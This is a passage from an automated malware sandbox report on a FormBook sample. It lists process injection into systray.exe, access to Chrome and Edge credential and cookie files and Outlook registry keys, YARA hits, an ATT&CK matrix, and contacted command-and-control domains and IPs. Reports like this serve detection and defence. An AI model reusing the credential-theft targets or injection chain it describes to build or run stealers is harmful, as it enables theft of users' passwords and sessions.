              Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 2300Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\systray.exeThread APC queued: target process: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: x6fGRpae78G.exe, 00000003.00000002.4495819772.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000000.2396234609.0000000001941000.00000002.00000001.00040000.00000000.sdmp, x6fGRpae78G.exe, 00000006.00000002.4496111779.0000000001AD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612323 Sample: JJ0tnjLiDS.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 24 www.zkplant.xyz 2->24 26 www.limiles.xyz 2->26 28 13 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Antivirus detection for URL or domain 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 44 4 other signatures 2->44 9 JJ0tnjLiDS.exe 2->9         started        signatures3 42 Performs DNS queries to domains with low reputation 26->42 process4 signatures5 48 Maps a DLL or memory area into another process 9->48 12 x6fGRpae78G.exe 9->12 injected process6 signatures7 50 Found direct / indirect Syscall (likely to bypass EDR) 12->50 15 systray.exe 13 12->15         started        process8 signatures9 52 Tries to steal Mail credentials (via file / registry access) 15->52 54 Tries to harvest and steal browser information (history, passwords, etc) 15->54 56 Modifies the context of a thread in another process (thread injection) 15->56 58 3 other signatures 15->58 18 x6fGRpae78G.exe 15->18 injected 22 firefox.exe 15->22         started        process10 dnsIp11 30 www.limiles.xyz 209.74.64.58, 49997, 49998, 49999 MULTIBAND-NEWHOPEUS United States 18->30 32 newcdn.goedgecdnxx.com 104.214.171.173, 50013, 50014, 50015 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->32 34 7 other IPs or domains 18->34 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.